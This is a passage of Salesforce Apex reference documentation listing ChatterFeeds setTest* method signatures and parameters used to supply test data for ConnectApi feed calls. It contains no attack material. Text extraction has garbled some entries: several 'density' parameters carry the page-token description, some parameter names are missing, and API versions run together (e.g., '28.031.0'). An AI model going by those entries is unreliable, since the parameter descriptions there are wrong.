ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
736
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
737
Reference
ChatterFeeds Class
showInternalOnly
Type: Boolean
Specifies whether to show only feed items from internal (non-community) users (true), or not (false). The default value is
false.
filter
Type: ConnectApi.FeedFilter
Specifies the feed filters.
AllQuestionsOnly feed elements that are questions.
SolvedQuestionsOnly feed elements that are questions and that have a best answer.
UnansweredQuestionsOnly feed elements that are questions and that dont have any answers.
UnsolvedQuestionsOnly feed elements that are questions and that dont have a best answer.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, Boolean, ConnectApi.FeedFilter)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestGetFeedElementsFromFilterFeed(String communityId, String
subjectId, String keyPrefix, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
738
Reference
ChatterFeeds Class
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsFromFilterFeed(String, String, String)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestGetFeedElementsFromFilterFeed(String communityId, String
subjectId, String keyPrefix, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder
sortParam, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
739
Reference
ChatterFeeds Class
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsFromFilterFeed(String, String, String, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
31.0
740
Reference
ChatterFeeds Class
Signature
public static Void setTestGetFeedElementsFromFilterFeed(String communityId, String
subjectId, String keyPrefix, Integer recentCommentCount, Integer elementsPerClump,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
741
Reference
ChatterFeeds Class
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsFromFilterFeed(String, String, String, Integer, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestGetFeedElementsFromFilterFeedUpdatedSince(String communityId,
String subjectId, String keyPrefix, Integer recentCommentCount, Integer elementsPerClump,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize, String updatedSince,
ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
recentCommentCount
Type: Integer
742
Reference
ChatterFeeds Class
The maximum number of comments to return with each feed element. The default value is 3.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token defining the modification time stamp of the feed and the sort order.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsFromFilterFeedUpdatedSince(String, String, String, Integer, Integer, ConnectApi.FeedDensity, String, Integer, String)
Testing ConnectApi Code
API Version
31.0
743
Reference
ChatterFeeds Class
Signature
public static Void setTestGetFeedElementsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, String updatedSince, ConnectApi.FeedElementPage
result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedElementPage response body.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
744
Reference
ChatterFeeds Class
Return Value
Type: Void
SEE ALSO:
getFeedElementsUpdatedSince(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, String)
Testing ConnectApi Code
API Version
32.0
Signature
public static Void setTestGetFeedElementsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, String updatedSince, ConnectApi.FeedFilter filter,
ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
745
Reference
ChatterFeeds Class
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedElementPage response body.
filter
Type: ConnectApi.FeedFilter
Specifies the feed filters.
AllQuestionsOnly feed elements that are questions.
SolvedQuestionsOnly feed elements that are questions and that have a best answer.
UnansweredQuestionsOnly feed elements that are questions and that dont have any answers.
UnsolvedQuestionsOnly feed elements that are questions and that dont have a best answer.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsUpdatedSince(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, String,
ConnectApi.FeedFilter)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestGetFeedElementsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize, String updatedSince,
ConnectApi.FeedElementPage result)
746
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
If feedType is ConnectApi.Record, subjectId can be any record ID, including a group ID. Otherwise, it must be the
context user or the alias me.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedElementPage response body.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
747
Reference
ChatterFeeds Class
Return Value
Type: Void
SEE ALSO:
getFeedElementsUpdatedSince(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer, String)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestGetFeedElementsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize, String updatedSince,
Boolean showInternalOnly, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
748
Reference
ChatterFeeds Class
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedElementPage response body.
showInternalOnly
Type: Boolean
Specifies whether to show only feed elements from internal (non-community) users (true), or not (false). The default value is
false.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsUpdatedSince(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer, String,
Boolean)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestGetFeedElementsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount, Integer
elementsPerClump, ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
String updatedSince, Boolean showInternalOnly, ConnectApi.FeedElementPage result)
749
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
density
Type: ConnectApi.FeedDensity
Specify the amount of content in a feed.
AllUpdatesDisplays all updates from people and records the user follows and groups the user is a member of.
FewerUpdatesDisplays all updates from people and records the user follows and groups the user is a member of, but
hides some system-generated updates from records.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedElementPage response body.
showInternalOnly
Type: Boolean
Specifies whether to show only feed elements from internal (non-community) users (true), or not (false). The default value is
false.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
750
Reference
ChatterFeeds Class
Return Value
Type: Void
SEE ALSO:
getFeedElementsUpdatedSince(String, ConnectApi.FeedType, String, Integer, Integer, ConnectApi.FeedDensity, String, Integer,
String, Boolean)
Testing ConnectApi Code
API Version
32.0
Signature
public static Void setTestGetFeedElementsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount, Integer
elementsPerClump, ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
String updatedSince, Boolean showInternalOnly, ConnectApi.FeedFilter filter,
ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
751
Reference
ChatterFeeds Class
density
Type: ConnectApi.FeedDensity
Specify the amount of content in a feed.
AllUpdatesDisplays all updates from people and records the user follows and groups the user is a member of.
FewerUpdatesDisplays all updates from people and records the user follows and groups the user is a member of, but
hides some system-generated updates from records.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedElementPage response body.
showInternalOnly
Type: Boolean
Specifies whether to show only feed elements from internal (non-community) users (true), or not (false). The default value is
false.
filter
Type: ConnectApi.FeedFilter
Specifies the feed filters.
AllQuestionsOnly feed elements that are questions.
SolvedQuestionsOnly feed elements that are questions and that have a best answer.
UnansweredQuestionsOnly feed elements that are questions and that dont have any answers.
UnsolvedQuestionsOnly feed elements that are questions and that dont have a best answer.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElementsUpdatedSince(String, ConnectApi.FeedType, String, Integer, Integer, ConnectApi.FeedDensity, String, Integer,
String, Boolean, ConnectApi.FeedFilter)
Testing ConnectApi Code
752
Reference
ChatterFeeds Class
API Version
28.031.0
Signature
public static Void setTestGetFeedItemsFromFeed(String communityId, ConnectApi.FeedType
feedType, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedItemsFromFeed(String, ConnectApi.FeedType)
Testing ConnectApi Code
API Version
28.031.0
753
Reference
ChatterFeeds Class
Signature
public static Void setTestGetFeedItemsFromFeed(String communityId, ConnectApi.FeedType
feedType, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam,
ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedItemsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
754
Reference
ChatterFeeds Class
API Version
29.031.0
Signature
public static Void setTestGetFeedItemsFromFeed(String communityId, ConnectApi.FeedType
feedType, Integer recentCommentCount, ConnectApi.FeedDensity density, String pageParam,
Integer pageSize, ConnectApi.FeedSortOrder sortParam, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
755
Reference
ChatterFeeds Class
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedItemsFromFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
28.031.0
Signature
public static Void setTestGetFeedItemsFromFeed(String communityId, ConnectApi.FeedType
feedType, String subjectId, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
756
Reference
ChatterFeeds Class
Return Value
Type: Void
SEE ALSO:
getFeedItemsFromFeed(String, ConnectApi.FeedType, String)
Testing ConnectApi Code
API Version
28.031.0
Signature
public static Void setTestGetFeedItemsFromFeed(String communityId, ConnectApi.FeedType
feedType, String subjectId, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder
sortParam, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
757
Reference
ChatterFeeds Class
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedItemsFromFeed(String, ConnectApi.FeedType, String, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
29.031.0
Signature
public static Void setTestGetFeedItemsFromFeed(String communityId, ConnectApi.FeedType
feedType, String subjectId, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam,
ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
758
Reference
ChatterFeeds Class
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedItemsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder)
Testing ConnectApi Code
759
Reference
ChatterFeeds Class
API Version
30.031.0
Signature
public static Void setTestGetFeedItemsFromFeed(String communityId, ConnectApi.FeedType
feedType, String subjectId, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam, Boolean,
showInternalOnly, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
760
Reference
ChatterFeeds Class
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
showInternalOnly
Type: Boolean
Specifies whether to show only feed items from internal (non-community) users (true), or not (false). The default value is
false.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedItemsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, Boolean)
Testing ConnectApi Code
API Version
28.031.0
Signature
public static Void setTestGetFeedItemsFromFilterFeed(String communityId, String
subjectId, String keyPrefix, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
761
Reference
ChatterFeeds Class
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedItemsFromFilterFeed(String, String, String)
Testing ConnectApi Code
API Version
28.031.0
Signature
public static Void setTestGetFeedItemsFromFilterFeed(String communityId, String
subjectId, String keyPrefix, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder
sortParam, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
762
Reference
ChatterFeeds Class
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedItemsFromFilterFeed(String, String, String, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
29.031.0
Signature
public static Void setTestGetFeedItemsFromFilterFeed(String communityId, String
subjectId, String keyPrefix, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam,
ConnectApi.FeedItemPage result)
763
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
764
Reference
ChatterFeeds Class
Return Value
Type: Void
SEE ALSO:
getFeedItemsFromFilterFeed(String, String, String, Integer, ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
30.031.0
Signature
public static Void setTestGetFeedItemsFromFilterFeedUpdatedSince(String communityId,
String subjectId, String keyPrefix, Integer recentCommentCount, ConnectApi.FeedDensity
density, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam, String
updatedSince, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
765
Reference
ChatterFeeds Class
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. To retrieve this token,
call getFeedItemsFromFilterFeed and take the value from the updatesToken property of the
ConnectApi.FeedItemPage response body.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedItemsFromFilterFeedUpdatedSince(String, String, String, Integer, ConnectApi.FeedDensity, String, Integer, String)
Testing ConnectApi Code
API Version
30.031.0
766
Reference
ChatterFeeds Class
Signature
public static Void setTestGetFeedItemsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, String updatedSince)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedItemPage response body.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
767
Reference
ChatterFeeds Class
Return Value
Type: Void
SEE ALSO:
getFeedItemsUpdatedSince(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, String)
Testing ConnectApi Code
API Version
30.031.0
Signature
public static Void setTestGetFeedItemsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize, String updatedSince,
ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
